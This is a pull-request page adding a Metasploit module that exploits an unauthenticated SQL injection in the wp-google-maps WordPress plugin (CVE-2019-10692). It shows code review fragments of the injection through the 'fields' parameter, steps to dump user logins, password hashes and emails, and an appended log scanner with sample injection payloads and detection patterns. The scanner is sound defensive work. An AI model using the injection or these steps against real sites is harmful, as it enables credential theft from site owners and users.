Add wp-google-maps unauthenticated SQL injection (CVE-2019-10692) #11698
Conversation
'uri' => normalize_uri(target_uri.path, '/wp-json/wpgmza/v1/markers/'),
'vars_get' => {
  'filter' => '{}',
  'fields' => sql_query,
a very slight improvement would be to change this to "#{sql_query}-- -" so you don't need to pass the -- - each time
Done.
end

unless credentials.empty?
  loot = store_loot("wp_google_maps.http", "text/plain", rhost, credentials)
This is most likely debatable, but I'd actually personally prefer storing body or even res here and calling it wp_google_maps.json with the appropriate ctype. Only because we have extra data (I believe) in the query that wasn't printed, may as well store it.
Done.
  private_type: :nonreplayable_hash,
  status: Metasploit::Model::Login::Status::UNTRIED,
  proof: user['user_email']
}.merge(service_details)
Doesn't look like service_details was ever defined?
Oops, done.
Thanks for the review @h00die 👍
PR opened Synacktiv-contrib#2
Wp google maps sqli update
Release Notes
The wp_google_maps_sqli auxiliary module exploits a SQL injection in a REST endpoint registered by the WordPress plugin wp-google-maps from v7.11.00 through v7.11.17.
This auxiliary module aims to exploit an unauthenticated SQL injection in the WordPress module wp-google-maps (CVE-2019-10692). The code is heavily based on auxiliary/admin/http/wp_symposium_sql_injection, but it may require some final tweaking :-)

Verification

- Install the wp-google-maps plugin (eg. 7.11.17) and enable it
- msfconsole
- use auxiliary/admin/http/wp_google_maps_sql_injection
- set RHOST <ip>
- check: it should say that the target is vulnerable
- run: it should show the fields user_login, user_pass and user_email of the whole wp_users table
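From the defender's side, the useful takeaway of this PR is that the injection travels in the `fields` GET parameter of `/wp-json/wpgmza/v1/markers/`, so it is visible in ordinary web server access logs. The following Ruby log scanner is an added example written for this page; it is not part of the PR, of the Metasploit module, or of the plugin. The access-log lines are constructed for the example, and the `ENDPOINT` constant, the `SAFE_FIELDS`/`SUSPICIOUS_TOKENS` heuristics and the function names are the example's own assumptions: a legitimate `fields` value is treated as a plain comma-separated column list, and anything carrying SQL comment markers (including the `-- -` terminator discussed in the review), quotes, statement separators or query keywords is flagged.

```ruby
require 'cgi'

# Endpoint registered by the wp-google-maps plugin that the module targets.
ENDPOINT = '/wp-json/wpgmza/v1/markers/'

# Assumption of this example: a legitimate 'fields' value is a comma-separated
# list of column names and nothing else.
SAFE_FIELDS = /\A[A-Za-z0-9_,\s]*\z/

# Tokens that have no business in a column list: SQL comment markers (covers the
# "-- -" terminator), quotes, statement separators and a few query keywords.
SUSPICIOUS_TOKENS = /--|\#|\/\*|'|;|\b(?:union|select|from|where)\b/i

# Common Log Format line:  ip - - [ts] "GET /path?q HTTP/1.1" 200 123
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<target>[^\s"]+)[^"]*" (?<status>\d{3}) (?<size>\S+)/

# Constructed sample log lines for this example (not taken from any real server):
# one benign markers request, two injection attempts, one unrelated request.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [10/Apr/2019:10:00:01 +0000] "GET /wp-json/wpgmza/v1/markers/?filter=%7B%7D&fields=id%2Ctitle HTTP/1.1" 200 512
  203.0.113.9 - - [10/Apr/2019:10:00:02 +0000] "GET /wp-json/wpgmza/v1/markers/?filter=%7B%7D&fields=user_login%2Cuser_pass%20from%20wp_users--%20- HTTP/1.1" 200 2048
  198.51.100.2 - - [10/Apr/2019:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 4096
  203.0.113.9 - - [10/Apr/2019:10:00:04 +0000] "GET /wp-json/wpgmza/v1/markers/?fields=id%20where%201%3D1%23 HTTP/1.1" 500 900
LOG

# Parses one access-log line into a hash; returns nil if the line does not match.
# The query string is split off by hand so odd characters never reach URI.parse.
def parse_line(line)
  m = LOG_LINE.match(line)
  return nil unless m
  path, query = m[:target].split('?', 2)
  params = query ? CGI.parse(query) : {}   # CGI.parse URL-decodes the values
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: path,
    params: params, status: m[:status].to_i }
end

# :unrelated  - not a request to the markers endpoint (or an unparseable line)
# :benign     - markers request whose 'fields' is a plain column list
# :suspicious - markers request whose 'fields' carries SQL syntax
def classify(entry)
  return :unrelated if entry.nil? || entry[:path].chomp('/') != ENDPOINT.chomp('/')
  fields = entry[:params].fetch('fields', []).join(',')
  return :suspicious if fields.match?(SUSPICIOUS_TOKENS) || !fields.match?(SAFE_FIELDS)
  :benign
end

# Returns one alert per suspicious request, carrying the decoded 'fields' value
# so an analyst can see what was sent without re-parsing the log.
def detect(log_text)
  log_text.each_line.map do |raw|
    entry = parse_line(raw.chomp)
    next unless classify(entry) == :suspicious
    { ip: entry[:ip], ts: entry[:ts], status: entry[:status],
      fields: entry[:params].fetch('fields', []).join(',') }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  detect(SAMPLE_LOG).each do |a|
    puts "#{a[:ts]} #{a[:ip]} status=#{a[:status]} fields=#{a[:fields].inspect}"
  end
end
```

The two-sided check matters: the `SAFE_FIELDS` whitelist catches anything that is not a column list even when no keyword is present, while `SUSPICIOUS_TOKENS` catches bare keywords such as `from` that would otherwise pass the character whitelist. Both patterns are heuristics tuned to this one endpoint; on a real WordPress host the same scanner should be fed the actual access log and the endpoint path checked against the plugin version in use, since the 7.11.00 to 7.11.17 range named in the release notes is the only one the page covers.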